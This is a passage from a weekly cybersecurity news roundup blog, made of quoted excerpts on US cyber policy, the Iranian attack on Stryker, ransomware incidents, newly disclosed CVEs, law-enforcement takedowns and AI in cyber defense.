    • “Through a network of affiliated organizations, the CVE Program vets vulnerability reports and assigns each flaw a unique CVE number, which helps researchers, businesses, government agencies and information-sharing groups track the flaws and understand their impact. The program is widely considered a crown jewel of the cybersecurity community. But its fate is uncertain after the nonprofit MITRE Corporation, which runs the program, almost lost crucial federal funding last year.
    • “On top of those logistical woes, the broader CVE ecosystem is also reeling from the dramatic AI-powered increase in the number of vulnerability reports flowing into software vendors and open-source platforms.”
  • Cyberscoop adds,
    • “Four former National Security Agency directors shared varying concerns about a lack of earnest and widespread response to growing threats in cyberspace during a discussion at the RSAC 2026 Conference on Tuesday.
    • “Accelerating threats posed by artificial intelligence, China and cybercriminals at large are testing the country’s resolve and determination to foster meaningful public-private collaboration, the former commanders of U.S. Cyber Command said. 
    • “While the four-star military officials remain confident in the country’s resources and people committed to defending the nation from cyberattacks, they voiced unease about challenges that could upend technological dominance and diminish a collective response to serious intrusions. 
    • “I think we’ve become numb to it,” retired Gen. Paul Nakasone said. “We continue to see these different intrusions, and intrusions have gotten to a size that the scale is just incredible to me.”
  • and
    • “A year-long effort to strengthen cybersecurity and modernize tech at U.S. intelligence agencies has led to policy standards for using AI to bolster cyber defenses, a shared repository of all apps that have undergone a cybersecurity review and more, the Office of the Director of National Intelligence announced Thursday [March 26].
    • “An unclassified summary of cyber and tech modernization work under the first year of DNI Tulsi Gabbard’s stewardship states that the office has expanded the automation of threat hunting across intelligence community networks. (The Cybersecurity and Infrastructure Security Agency conducts threat hunting across federal civilian agencies.)
    • The ODNI also has developed a zero-trust strategy that shifts “to a data-centric security model that protects information regardless of location or network,” according to the summary.
    • “Over the past year, we have taken meaningful steps to begin fulfilling that responsibility through the largest IC-wide technology investment and modernization effort in history,” Gabbard said in a news release. “President Trump’s Intelligence Community is moving faster and more decisively on cybersecurity modernization and investments in IT than ever before, delivering stronger defenses, greater efficiency, and real cost savings for the American people.”   
  • Tech Target shares a boatload of other insights from the RSAC conference.
  • Federal News Network tells us,
    • “The Trump administration is prioritizing ensuring the government leads on adopting artificial intelligence for cyber defense, according to a top Office of Management and Budget official.
    • “The use of “AI-enabled cyber tools” is specifically called out in the new national cybersecurity strategy. The White House’s top cyber official has said the administration will launch a series of pilot programs to harden government networks under the new strategy.
    • White House officials in recent weeks convened a roundtable featuring “representatives from industry as well as agencies who are at the cutting edge of cyber defense, to talk about how we can really operationalize AI for cyber defense,” Nick Polk, branch director for cybersecurity within OMB’s Office of the Chief Information Officer, said during a Thursday webinar hosted by the Digital Government Institute.
    • “This is something where we have really decided that we want to take the mantle and have the government lead in this space,” Polk added.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency, after a year of workforce reductions that has left CISA’s ranks depleted, is planning to recruit more than 300 people in the coming months.
    • “The cyber agency is also loosening restrictions around flexible work schedules for its employees.
    • “Acting CISA Director Nick Andersen announced those plans in a March 23 email to staff. Andersen said Department of Homeland Security headquarters had approved CISA’s “critical hire list,” including 329 “mission critical hires” throughout the agency.
    • “During the ongoing government shutdown, CISA will only be hiring for “excepted” positions, Andersen added. Roughly two-thirds of CISA’s staff is currently furloughed due to the DHS shutdown.
  • Cybersecurity Dive informs us,
    • “The Federal Communications Commission on Monday said it will no longer approve imported routers for consumer use without government review. 
    • “An interagency body convened by the White House determined that consumer-grade routers made outside the U.S. present an unacceptable risk to national security, according to FCC officials. 
    • “The Trump administration’s 2025 National Security Strategy says the U.S. should not be dependent on an outside power for core components considered vital to the nation’s economy or defense.”
  • Cyberscoop points out,
    • “An operation to crack down on the widely used RedLine infostealer has netted the extradition of an Armenian man to the United States, where he made an initial appearance in a Texas court Wednesday.
    • Authorities charged Hambardzum Minasyan with conspiracy to commit access device fraud, conspiracy to violate the Computer Fraud and Abuse Act and conspiracy to commit money laundering for his alleged role with RedLine. Infostealers thieve billions of user credentials such as passwords annually.”
  • Security Week adds,
    • “Russian cybercriminal Ilya Angelov, known online as ‘Milan’ and ‘Okart’, has been sentenced to two years in federal prison for his role in the administration of a botnet used to facilitate ransomware attacks, the DOJ announced on Tuesday [March 24].
    • “According to the DOJ, Angelov was part of a threat group tracked by the FBI as Mario Kart, and by the cybersecurity community as TA-551, Shathak, Gold Cabin, Monster Libra, G0127, and ATK236.
    • “The charges against Angelov stem from activities he engaged in between 2017 and 2021, during which his cybercrime group built a botnet by distributing malware via spam email attachments.” * * *
    • “Angelov’s sentencing comes shortly after the DOJ announced that another Russian national, Aleksei Volkov, has been sentenced to 81 months in prison for his role in ransomware attacks.” 
  • The Wall Street Journal notes,
    • “Global hackers are getting better at drawing lessons from online crime busts to build more resilient operations, posing a dilemma for law-enforcement officials.
    • “The problem, known as tactical exposure, is expected to deepen amid calls by the White House for more aggressive action against cybercrime and a recent wave of takedowns and disruptions of cybercrime networks and platforms.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “A sophisticated China-nexus threat actor has embedded digital sleeper cells into the networks of telecom firms in multiple countries, according to a report released Thursday from cybersecurity firm Rapid7.
    • “The adversary, tracked as Red Menshen, has used a stealthy, Linux-based implant called BPFdoor that is designed to function within the operating system kernel.
    • “The goal is to run an espionage campaign against critical industry segments and government agencies, maintaining a long-term presence inside these networks, Rapid7 researchers said. ‘There are similarities to campaigns previously launched by other China-nexus actors, including Volt Typhoon and Salt Typhoon, but the mechanisms have evolved and the strategic objectives of these attacks have a longer tail.”
  • and
    • “The evolving threat landscape has placed identity governance at the center of cybersecurity, according to a pair of reports released this week, meaning that organizations should prioritize identity management as a way to protect sprawling computer networks from under-the-radar intrusions.
    • Cloudflare’s report, released Wednesday, and PwC’s report, released Tuesday, both emphasize the need for companies to do a better job of monitoring user behavior and scanning for suspicious network activity.
    • “The rise of AI only makes identity governance even more important, researchers wrote, as the technology helps hackers improve their impersonation tactics.”
  • and
    • “Security researchers warn that a critical vulnerability in Citrix NetScaler products might lead to a wave of exploitation that could rival the 2023 CitrixBleed crisis. 
    • “Citrix on Monday [March 23] disclosed an insufficient input validation flaw in NetScaler ADC and NetScaler Gateway application-delivery products, tracked as CVE-2026-3055, with a severity score of 9.3. 
    • “Citrix also disclosed a race condition flaw, tracked as CVE-2026-4368, in the same products. That vulnerability has a severity score of 7.7.
    • “The input validation flaw can allow an attacker to leak sensitive information, similar to the original CitrixBleed flaw, which led to a wave of high profile data theft and ransomware attacks. 
    • “NetScalers are critical solutions that have been continuously targeted for initial access into enterprise environments,” Benjamin Harris, founder and CEO of watchTowr, told Cybersecurity Dive.”
  • Cyberscoop relates,
    • “Researchers and threat hunters are scrambling to contain a maximum-severity defect in Ubiquiti’s UniFi Network Application that attackers could exploit to take over user accounts by accessing and manipulating files.
    • “The path-traversal vulnerability — CVE-2026-22557 — affects software used to manage UniFi networking devices, including access points, gateways and switches. The vendor disclosed and released patches for the defect in a security advisory Wednesday [March 25].
    • “As of this morning, we have not observed any public proof-of-concept exploits or confirmed reports of exploitation in the wild,” Matthew Guidry, senior product detection engineer at Censys, told CyberScoop.
    • “However, because this is a path-traversal vulnerability, the technical complexity for an attacker is typically lower than memory-corruption or buffer-overflow bugs,” he added. “Given that the CVSS 10 rating implies low attack complexity, we anticipate that once the specific vulnerable endpoint is identified, exploitation will be trivial to automate.”

From the ransomware front,

  • The Bangor Daily News reports,
    • “The Maine mental health agency AMHC was the subject of a ransomware attack this month allegedly perpetrated by a Russia-based cybercrime group. 
    • “Qilin, which analysts have cited as the world’s leading ransomware threat, added the Presque Isle-based healthcare organization to a list of victims on its dark web data leak site Tuesday, according to screenshots and reports posted by more than a dozen websites and groups that track ransomware. 
    • “AMHC is the largest behavioral healthcare provider for a large swath of rural Maine, operating in Aroostook, Hancock and Washington counties. It has more than 350 employees and over 5,500 clients between 27 service locations, according to its website. 
    • “The organization acknowledged the attack in a statement to the Bangor Daily News Wednesday, saying that it “recently experienced a network disruption,” and that it had partnered with “cyber incident specialists” to investigate.”
  • Dark Reading relates,
    • “Ransomware is not only growing, threat actors are also accelerating the pace of their attacks by using offensive tools to exploit valid credentials and hit targets with speed and precision. 
    • “The practice has undergone big changes over the past five years. Initially, attacks focused on encrypting data; now, threat actors threaten to extract it to pressure victims into paying. Double-extortion tactics quickly shifted to triple-extortion threats to expose stolen data. Threat actors also transitioned from extorting companies to contacting victims directly — whatever it takes to rake in the cash.
    • “The latest shift is all about speed. Ransomware actors discovered methods to bypass endpoint detection and response (EDR) tools, and they’re increasingly using artificial intelligence (AI) to steal data more quickly. 
    • “Halcyon’s 2026 Method Survey Report reveals that while 98% of organizations use EDR tools for ransomware defense, only 25% “actually trust it to defend against today’s evolving ransomware threat.” Additionally, 78% of surveyed participants say AI made ransomware attacks more effective. Conversely, only 6% believe the tools have improved their own defenses.”  
  • CSO adds,
    • “In 2025, attacker dwell time rose, voice phishing topped email phishing, and threat actors increasingly targeted backup and identity systems, according to Mandiant’s latest incident response data.
    • “Mandiant’s M-Trends 2026 report, released today at the RSA Conference, shows that attackers are moving faster, operating more collaboratively, and increasingly focusing on the systems organizations rely on to recover from breaches.
    • “The report, based on more than 500,000 hours of incident response engagements in 2025, finds that attackers are compressing key phases of the attack lifecycle, even as median dwell time increased to 14 days, up from 11 days the previous year.
    • “In addition, it reveals a change in tactics. Voice phishing accounted for 11% of initial infection vectors, making it the second most common entry point after exploits, which led at 32%. Email phishing declined to 6%, down from 14% the year before, reflecting a move toward more interactive social engineering. Together, the trends point to a shift in both how quickly attacks unfold and what attackers are trying to achieve once inside.”
  • Tech Radar explains why stolen credentials continue to work even when multi-factor authentication is in place.
  • Cybersecurity Dive tells us,
    • “Businesses need to think carefully about when they publicly blame a threat actor for a cyberattack, lest they invite unwanted consequences, experts said at a panel at the RSAC 2026 Conference here on Tuesday.
    • “The rush to attribute is a risky one,” Megan Stifel, the chief strategy officer at the Institute for Security and Technology, a cybersecurity think tank, said during a panel discussion.
    • “Brett Callow, a ransomware expert and senior adviser at FTI Consulting who advises cyberattack victims, called attribution “extremely risky” because “you are bringing third parties into the discussion, and those third parties may very well respond.”

From the cybersecurity defenses front,

  • Cyberscoop reports,
    • “Google is accelerating its timeline for migrating its products to quantum resistant encryption to 2029, the latest sign that tech leaders are worried that they haven’t been aggressive enough in planning for a post-quantum future.
    • “In a blog posted Wednesday [March 25], vice president of security engineering Heather Adkins and senior staff cryptology engineer Sophie Schmieg said that Google and other tech companies have observed faster than expected advances in several quantum fields.
    • “This new timeline reflects migration needs for the PQC era in light of progress on quantum computing hardware development, quantum error correction, and quantum factoring resource estimates,” Adkins and Schmieg wrote.
    • “Google is replacing outdated encryption across their devices, systems and data with new algorithms vetted by the National Institute for Standards and Technology. Those algorithms, developed over a decade by NIST and independent cryptologists, are designed to protect against future attacks from quantum computers.”
  • Cybersecurity Dive relates,
    • “Businesses hoping AI can automate away their security woes should think again, because the technology isn’t a cure-all and is actually introducing new risks, experts warned at the RSAC 2026 Conference here.
    • “We’re seeing advantages [with AI for defense], but we’re also seeing a lot of hiccups as we figure out how to get there,” Adam Pennington, who oversees MITRE’s ATT&CK framework, said during a panel about how AI is changing the push-and-pull between attackers and defenders.
    • “Security teams are using AI in a lot of the same ways as hackers, Pennington said, especially rapid code-writing. “There does need to be some caution, though, in using it directly in defense,” he said. “False positives have always been a problem in trying to apply machine learning and AI to defense.”
    • “The warnings from Pennington and others on the panel come as businesses rush to purchase AI security services, often with seemingly little regard for their efficacy or tradeoffs.”
  • Dark Reading adds,
    • “Organizations may want to think twice before consulting with AI models on software dependency decisions.
    • “New research from Sonatype found that “frontier” models (defined as the most advanced AI models available at a given moment) often generate faulty or fabricated recommendations for software dependencies, which spells trouble for organizations that lean on AI for upgrade and patching guidance. 
    • “Sonatype’s research team analyzed 36,870 unique dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet between June and August 2025. In all, the DevSecOps company studied a total of 258,000 recommendations generated by seven AI models from Anthropic, OpenAI, and Google.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the Iranian War front,

  • The Wall Street Journal reminds us,
    • “Iran pulled off likely the most significant wartime cyberattack against the U.S. in history, leveraging its hacking powers to cause major disruptions at a global medical-equipment firm that struggled to bring itself back online in recent days.
    • “The attack brought a conflict that until now had been largely confined to the Gulf region to the American homeland and offered a preview of the potential for how Iran may broaden its response to the U.S. and Israeli military campaign.
    • Stryker, the Michigan-based firm hit in the hack, said it experienced “global disruption” and quickly contained it. The company said it believed the incident had been limited to its internal Microsoft systems. The company added that some hospitals may be experiencing temporary pauses in transmissions of medical data, but that its connected products “are not impacted and are safe to use.” Microsoft hasn’t commented on the hack.”
  • The American Hospital Association News adds,
    • “The Cybersecurity and Infrastructure Security Agency [CISA] March 18 released an alert urging U.S. organizations to harden their endpoint management systems following the March 11 cyberattack against Stryker, a U.S.-based medical technology and supply firm. The attack impacted the company’s Microsoft environment, and Stryker said there was no indication of ransomware or malware. The CISA alert provides various recommendations and resources, as well as best practices for securing Microsoft Intune.”
  • Cybersecurity Dive informs us,
    • “The Department of Justice on Thursday [March 19] said four domains used for Iranian-backed hacking and intimidation of political opponents have been taken down in a court-ordered operation. 
    • “Two of the domains were connected to Handala, the state-linked threat group that authorities confirmed was behind the hack of Stryker, a Michigan-based medical technology giant. 
    • “A partially redacted FBI affidavit did not specifically identify Stryker by name, but the details of the attack match with the circumstances of the same incident.” * * *
    • “The sites were part of a larger effort by Iran’s Ministry of Intelligence and Security (MOIS) to intimidate dissidents, conduct malicious attacks, target Israelis and conduct violent attacks against journalists, according to court records. 
    • “Federal authorities obtained a seizure warrant Thursday, according to the FBI affidavit filed Thursday at U.S. District Court in Maryland.
    • “The FBI seizure is not expected to have a major impact on Handala’s ability to conduct attacks, said the Foundation for the Defense of Democracies (FDD).”  
  • Bleeping Computer offers “a five-step playbook to stop Iranian wiper campaigns before they spread.”

From the cybersecurity policy and law enforcement front,

  • Politico reports,
    • “The White House offered additional immigration enforcement concessions to Democrats Friday evening [March 20] as border czar Tom Homan met a second time with a bipartisan group of senators seeking to end the Homeland Security shutdown, according to lawmakers who attended.
    • “Leaving the private meeting, Republican senators said they hope Democrats respond over the weekend to the Trump administration’s bolstered proposal of immigration enforcement changes meant to address Democratic demands for funding DHS.”
  • The Wall Street Journal adds,
    • “March 27 is a make-or-break day for TSA officers.
    • “If Congress leaves that day for a scheduled two-week recess without reaching a deal to fund the Transportation Security Administration, officers are set to miss more than a month of paychecks.” 
  • Cybersecurity Dive lets us know,
    • “The Trump administration will make sure that new AI technologies are secure by design, a senior U.S. official said on Tuesday. [March 17]
    • “What we are working for in my lane is to ensure that the technical security is not seen as a barrier to that innovation, but is seen as a fundamental piece of the ability to scale it and move it as quickly as possible,” National Cyber Director Sean Cairncross said at an event hosted by the McCrary Institute for Cyber and Critical Infrastructure Security.”
    • “Cairncross addressed the audience in Washington two weeks after the Trump administration released its cybersecurity strategy, a short, high-level document that discussed critical infrastructure protection, emerging technologies and digital deterrence. Cairncross said the government wanted to work closely with the U.S. companies that operate important online infrastructure, including to counter foreign adversaries — but he stressed that the government would be the one conducting offensive operations.”
  • Per a March 12 FBI news release,
    • “The Federal Bureau of Investigation (FBI) is publishing this Public Service Announcement (PSA) to raise awareness of residential proxies, the risks they pose, and steps the public can take to safeguard their devices from becoming part of a residential proxy network. Cyber threat actors use residential proxies to facilitate illicit activities, while obfuscating their true identities and locations by routing internet traffic through home and small business internet networks.”
  • Per a NIST news release,
    • “The Domain Name System (DNS) plays an integral role in every organization’s security posture by translating domain names into IP addresses. It can serve as an enforcement point for enterprise security policy and an indicator of potential malicious activity on a network. A disruption or attack against the DNS can impact an entire organization.
    • “NIST Special Publication (SP) 800-81r3 (Revision 3), Secure Domain Name System (DNS) Deployment Guide, describes the different roles of DNS and gives recommendations for protecting the integrity, availability, and confidentiality of DNS services, including:
      • “The role DNS plays in supporting a zero trust architecture, such as serving as both a policy enforcement point (PEP) and a source of information when evaluating access requests
      • “The role of hosting DNS information (authoritative DNS), including guidance on protecting the integrity and authenticity of DNS information using DNSSEC
      • “The role of recursive DNS, including guidance on protecting the confidentiality of client DNS queries.”
  • Cyberscoop reports,
    • “Three American men were sentenced Friday [March 20] for crimes they committed in furtherance of North Korea’s vast scheme to get operatives hired at U.S. companies, the Justice Department said.
    • “The trio — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — pleaded guilty in November to wire fraud conspiracy for providing U.S. identities to remote North Korean IT workers.”
  • and
    • “A 27-year-old North Carolina man was found guilty of six counts of extortion for a series of crimes he committed while working as a data analyst contractor for a D.C.-based international technology company, the Justice Department said Thursday [March 19].
    • “Cameron Nicholas Curry, also known as “Loot,” stole a trove of corporate data, including sensitive employee and compensation information, which he used to extort his employer, according to court records. Curry ultimately made off with approximately $2.5 million from the victim organization in January 2024.
    • “The insider attack underscores immeasurable risks companies accept when employees, or contractors placed in roles by a third-party recruitment company, as was the case with Curry, are allowed to access sensitive data on a company-owned laptop. Officials did not name the company.”
  • and
    • “Authorities seized infrastructure powering four botnets that hijacked a combined three million devices and launched more than 300,000 DDoS attacks collectively, the Justice Department said Thursday [March 19].
    • The botnets — Aisuru, Kimwolf, JackSkid and Mossad — enabled operators to sell access to the infected devices for various cybercrimes. The aftermath spanned thousands of attacks, including some demanding extortion payments from victims, officials said.

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Russian intelligence-affiliated hackers have gained access to thousands of users’ messaging apps with a global phishing campaign, the FBI and the Cybersecurity and Infrastructure Security Agency warned in a public service announcement on Friday [March 20].
    • “The high-value targets they’re pursuing include current and former U.S. government officials, political figures, military personnel and journalists, the two agencies said in the joint PSA about the hackers’ attempts to infiltrate commercial messaging applications (CMAs).
    • “The U.S. alert comes on the heels of an earlier warning from Dutch authorities, who said last week that Russian hackers were “engaged in a large-scale global attempt” to take over WhatsApp and Signal accounts. The Dutch warning likewise followed a similar warning from Germany in February.
    • “The U.S. agencies emphasized that the hackers had not been able to bypass end-to-end encryption, instead manipulating users into giving up access. The scheme involves hackers posing as Signal help personnel, then inviting them to click a link or provide verification codes or account personal identification number.”
  • and
    • “Researchers and threat hunters are scrambling to contain a maximum-severity defect in Ubiquiti’s UniFi Network Application that attackers could exploit to take over user accounts by accessing and manipulating files.
    • “The path-traversal vulnerability — CVE-2026-22557 — affects software used to manage UniFi networking devices, including access points, gateways and switches. The vendor disclosed and released patches for the defect in a security advisory Wednesday.
    • “As of this morning, we have not observed any public proof-of-concept exploits or confirmed reports of exploitation in the wild,” Matthew Guidry, senior product detection engineer at Censys, told CyberScoop.
    • “However, because this is a path-traversal vulnerability, the technical complexity for an attacker is typically lower than memory-corruption or buffer-overflow bugs,” he added. “Given that the CVSS 10 rating implies low attack complexity, we anticipate that once the specific vulnerable endpoint is identified, exploitation will be trivial to automate.”
  • Cybersecurity Dive reports,
    • “North Korea’s remote IT worker schemes rely heavily on Western collaborators, an elaborate hierarchy of roles and the extensive use of an open-source messaging application, IBM and the cybersecurity vendor Flare said in a report published on Wednesday.
    • “The new research details the tactics and technologies that North Korean operatives use to trick companies into hiring them and fly under the radar while they funnel their salaries to Pyongyang.
    • “Flare and IBM said the report could help businesses improve their ability to root out North Korean operatives posing as legitimate employees.”
  • and
    • “Threat groups are increasingly targeting critical infrastructure for malicious attacks by using direct access to cyber-physical systems, according to a report released Wednesday by Claroty, a firm that specializes in industrial security. 
    • “These attackers, which often are state-sponsored or hacktivist groups, are abusing virtual network protocol in a majority of cases to gain remote access to exposed internet-facing assets. 
    • “In two-thirds of the tracked incidents, attackers are compromising human-machine interfaces or supervisory control and data acquisition systems, which are used to control various industrial processes in factories and other operational technology environments.” 

From the ransomware front,

  • The Record reports on March 17,
    • “A prominent ransomware gang has taken credit for a devastating attack on the biggest hospital in Mississippi and a large county in New Jersey. 
    • “The Medusa ransomware operation, which experts believe is run out of Russia, said recently it was behind the cyberattack on the University of Mississippi Medical Center (UMMC).” * * *
    • “The hospital fully reopened on March 2, and the Medusa ransomware gang claimed the attack last Thursday, demanding an $800,000 ransom. The hackers threatened to leak data stolen from the hospital by March 20.  
    • “A UMMC spokesperson declined to comment on the ransom threat.   
    • “Experts believe the Medusa operation is based in Russia due to its avoidance of targets in Commonwealth of Independent States, its Russian-language forum activity and the use of Cyrillic script in operational tools.” 
  • Cyberscoop adds,
    • “Ransomware remains a scourge that shows some signs of relenting, but incident responders and threat hunters are busier than ever as more financially-motivated attackers lean exclusively on data theft for extortion.
    • “Attacks that only involve data theft for extortion may not be more prevalent than traditional ransomware when attackers encrypt systems, but momentum is moving in that direction, Genevieve Stark, head of cybercrime intelligence at Google Threat Intelligence Group, told CyberScoop.
    • “When you look at the actors in the English-speaking underground, those actors are almost all just focusing on data-theft extortion right now,” Stark added. This includes groups like Scattered Spider, ShinyHunters, Clop and other groups that have been responsible for some of the largest and farthest-reaching attacks over the past few years.
    • “Google Threat Intelligence Group’s research report on ransomware, which it shared exclusively and discussed with CyberScoop prior to release, underscores how the evolution and spread of cybercrime can cloud a collective understanding of ransomware, or attacks that use malware to encrypt or lock systems.” 
  • eSecurity Planet explains,
    • “Why BYOD Is the Favored Ransomware Backdoor.
    • “80% of ransomware attacks come from unmanaged devices. Explore how BYOD could be ransomware’s favored method and how to protect against attacks.”
  • and
    • “Ransomware’s Opening Play: Target Identity First
    • “Ransomware attackers now target identity systems like Active Directory first. Learn how identity resilience can help you prevent and recover from attacks.”

From the cybersecurity defenses front,

  • Cyberscoop asks,
    • “Can Zero Trust survive the AI era?
    • “As AI increases the speed of cyber attacks, governments and businesses must weigh the tradeoffs that come with deploying semi-autonomous AI agents to stop them.”
  • Cybersecurity Dive adds,
    • “Corporate cybersecurity leaders believe AI will be essential to their missions, but, so far, few are seeing big gains from agentic security products, according to a new EY survey.
    • “With AI governance dominating C-suite agendas, the survey released on Thursday found that companies are making progress in integrating risk management frameworks into their operations, even if those ways of thinking have yet to fully permeate corporate cultures.
    • “The survey findings prompted EY to make four high-level recommendations to businesses still deciding how to adopt and use AI for cybersecurity.”
  • The ISACA Blog considers,
    • “A report by the Neuro-rights Foundation examined the privacy practices of around 30 compelling consumer neuro-technology companies and found that more than 90% relied on vague safeguarding language with no concrete protection of consumers’ neural data. Researchers at Bitbrainreported the possibility of neural signals being captured by attackers using man in the middle attacks, with modified information being readily re-injected since applications do not check the devices they are connected to.
    • “The enterprise security perimeter has now moved beyond networks and terminals into the brain itself as thoughts become potential attack vectors.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the Iran War front,

  • Dark Reading reports,
    • “Iranian state intelligence has been utilizing the cybercriminal underground to upgrade and provide cover for its offensive cyber activity.
    • “Iran’s Ministry of Intelligence and Security (MOIS) has long used hacktivism as a cover when it carries out cyberattacks. On March 11, for example, a wiper attack struck the Fortune 500 medical technology company Stryker. It was claimed by “Handala,” a group that positions itself as a pro-Palestine hacktivist operation, evidently itching to contribute to the ongoing US-Iran war. In fact, it’s a front for Void Manticore, an advanced persistent threat (APT) run out of Iran’s MOIS.
    • “This isn’t a new strategy. What is new, according to recent research from Check Point, is that MOIS hackers have been working with the real cybercriminals they’re pretending to be. Void Manticore, for example, has made the commercial infostealer Rhadamanthys a core element of its attack chains. Other MOIS entities have been linked to cybercrime clusters, even collaborating with ransomware-as-a-service (RaaS) operations.
    • Organizations need to be aware of this, says Sergey Shykevich, threat intelligence group manager at Check Point, “because there can be a case where a SOC or CISO will see something in their network that they associate with cybercrime activity [and label it] of low risk. And in reality, it will be an Iranian threat actor who will be able to execute destructive activities.”
  • The Wall Street Journal tells us on March 12,
    • “Stryker said a cyberattack related to the Iranian conflict is still disrupting its operations, including order processing, manufacturing and shipping.
    • “Stryker experienced a global disruption to its Microsoft systems following a cyberattack Wednesday, which resulted in the company asking 56,000 employees to disconnect from all networks and avoid turning on company devices.
    • “The hackers behind the attack said they were retaliating on behalf of Iran, The Wall Street Journal reported Wednesday.
    • “On Thursday, Stryker said operations were still disrupted, but it doesn’t believe its patient-related services or connected products have been impacted.”
  • Security Week adds,
    • “Stryker is a Fortune 500 company that specializes in the manufacturing of surgical equipment, orthopedic implants, and neurotechnology. Headquartered in Michigan, the company employs approximately 56,000 people and reported over $25 billion in revenue for 2025. Its critical role in the healthcare supply chain makes it an essential partner for hospitals worldwide.”
    • “The Iran-linked hacker group named Handala has taken credit for the attack, claiming to have struck an “unprecedented blow” to the company.”
  • and
    • Like other ideologically motivated hackers, profit is not Handala’s goal, according to Ismael Valenzuela, vice president of threat intelligence at the cybersecurity company Arctic Wolf.
    • “What distinguishes this group is its clear focus on data destruction rather than financial extortion,” he said in an email.
  • Cybersecurity Dive points out,
    • “Stryker said the cyberattack that hit the company this week has disrupted its manufacturing and shipping operations.
    • “The medtech company released the information Thursday night [March 12] in a statement posted to its website. Stryker did not detail the attack’s impact on its systems, but wrote in the statement that the incident has caused disruptions to order processing, manufacturing and shipping.
    • “However, we are working diligently to restore our systems and above all, we are committed to ensuring our customers can continue to deliver seamless patient care,” the company said.
    • Stryker maintained that the incident is contained to its internal Microsoft environment, and there is no malware or ransomware detected.”

From the cybersecurity policy and law enforcement front,

  • Federal News Network reports,
    • “U.S. Cyber Command and the National Security Agency have a new permanent leader. The Senate has confirmed Gen. Joshua Rudd to serve as the next director of CYBERCOM and NSA. The two organizations have been without a permanent leader since April, when President Donald Trump fired Gen. Timothy Haugh from the role. Some Democratic lawmakers objected to Rudd’s nomination, citing his lack of cyber experience needed to immediately step into the dual leadership position. Sen. Ron Wyden (D-Ore.) said that when it comes to U.S. cybersecurity, “there is simply no time for on-the-job learning.” It’s not clear when Rudd will be sworn in.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency (CISA) is postponing meetings with industry on a forthcoming cyber incident reporting rule due to the ongoing Department of Homeland Security shutdown.
    • “The shutdown is also “likely” to delay the final Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) rule, CISA confirmed today [March 9].
    • “In a notice posted to its website, CISA said it won’t be able to hold planned town halls on CIRCIA due to the lapse in appropriations. The town halls were scheduled for today, March 9, through early April.”
  • Cyberscoop relates,
    • “The Trump administration is plotting an interagency body to confront malign hackers, pilot programs to secure critical infrastructure across states and other steps tied to its freshly-released cyber strategy, National Cyber Director Sean Cairncross said Monday.
    • “The “interagency cell” will bring together agencies like the Justice Department, the Department of State, the FBI and the Pentagon, which will make it clear that going on cyber offense isn’t just about attacking enemies in cyberspace, Cairncross said.
    • “Sure, that’s part of it, but that’s not all of it,” he said at an event hosted by USTelecom. It will include diplomatic efforts, arrests and more, he said. “As President Trump has made clear, he expects results, and he’s empowered the team under him to go get them.
    • “A series of pilot programs will be catered to specific critical infrastructure industries in specific states, such as water in Texas and beef in South Dakota, Cairncross said. Different sectors operate at more or less mature levels, he said.”
  • Cybersecurity Dive tells us,
    • “Inconsistent definitions, overly burdensome information demands and duplicative requirements are some of the problems that U.S. businesses face in dealing with cybersecurity regulations, according to a recent Government Accountability Office report.
    • “Critical infrastructure organizations want federal agencies to work together to streamline their rules, according to the March 5 summary of a GAO panel discussion with infrastructure representatives.
    • “Businesses recommended several possible solutions to the regulatory sprawl, including agencies converging on common definitions of key terms.”
  • and
  • Cyberscoop informs us,
    • “41-year-old South Florida man is accused of conducting at least 10 ransomware attacks and helping accomplices extort a combined $75.25 million in ransom payments while he was working as a ransomware negotiator for DigitalMint. 
    • “Five of Angelo John Martino III’s alleged victims hired DigitalMint, which assigned Martino to conduct ransomware negotiations on their clients’ behalf — putting him in a position to play both sides, as the criminal responsible for the attack and the lead negotiator for his alleged victims, according to federal court records unsealed Wednesday.
    • “Martino allegedly obtained an affiliate account on ALPHV, also known as BlackCat, and conspired with other former cybersecurity professionals to break into victims’ networks, steal and encrypt data, and extort companies for ransoms over a six-month period in 2023.
    • “Martino was an unnamed co-conspirator in an indictment filed in November 2025 against Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia. Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.”
  • and
    • “Authorities from multiple countries dismantled SocksEscort, a residential proxy network cybercriminals used to commit large-scale fraud, claiming access to about 369,000 IP addresses since 2020, the Justice Department said Thursday.
    • “Europol, which aided the investigation alongside various law enforcement agencies, Lumen’s Black Lotus Labs and the Shadowserver Foundation, said the malicious proxy service compromised routers and IoT devices in 163 countries. Officials said the proxy network’s payment platform received about $5.8 million from its customers.
    • “The globally coordinated action, dubbed Operation Lightning, took down and seized 34 domains and 23 servers in seven countries. U.S. officials froze a combined $3.5 million in cryptocurrency allegedly linked to the botnet that was created from infected devices.
    • “Cybercrime thrives on anonymity,” Catherine De Bolle, executive director at Europol, said in a statement. “Proxy services like SocksEscort provide criminals with the digital cover they need to launch attacks, distribute illegal content and evade detection.”

From the cybersecurity breaches and vulnerabilities front,

  • MedTech Dive reports,
    • “Intuitive Surgical was hit by a cybersecurity phishing incident that compromised customer and employee data.
    • “Information was obtained from an employee’s compromised access into Intutive’s internal business administrative network, the surgical robotics firm said in a statement posted to its website. An unauthorized third party accessed information including customer business and contact information, as well employee and corporate data.
    • “The statement was posted on Thursday [March 12], an Intuitive spokesperson said in an email to MedTech Dive.
    • “When the incident was discovered, the company activated its incident response protocols and secured all affected applications.”
  • Bleeping Security adds,
    • “Starbucks has disclosed a data breach affecting hundreds of employees after threat actors gained access to their Starbucks Partner Central accounts.
    • “As the world’s largest coffeehouse chain, Starbucks has over 380,000 employees (also known as partners) and operates nearly 41,000 locations across 88 countries.
    • “In data breach notification letters filed with Maine’s Attorney General and sent to affected employees on Tuesday, the company says that it discovered the incident on February 6.
  • Cyberscoop relates,
